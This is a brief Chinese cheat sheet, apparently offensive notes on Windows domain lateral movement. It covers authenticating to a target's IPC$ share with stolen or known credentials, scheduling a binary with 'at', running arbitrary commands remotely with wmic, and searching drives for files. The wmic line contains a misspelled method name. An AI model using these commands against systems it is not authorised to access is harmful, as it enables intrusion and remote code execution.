域内
域内网由于共享的需要,xp加入域内后是可以用ipc$的
常用的:net use \\ip\ipc$ "pass" /user:"username"
net use \\ip\ipc$ /delete
有时候账号密码正确但是连不上,可以换一种方式:
net use \\ip\ipc$ pass /u:ip\user
net time \\ip
at \\ip time BIN
wmic
/node: "TARGET_IP" /user:"USER_NAME" /password:"PASS"
process call creat "CMD_command"
dir /s /b [c|d|e|f:]\file_name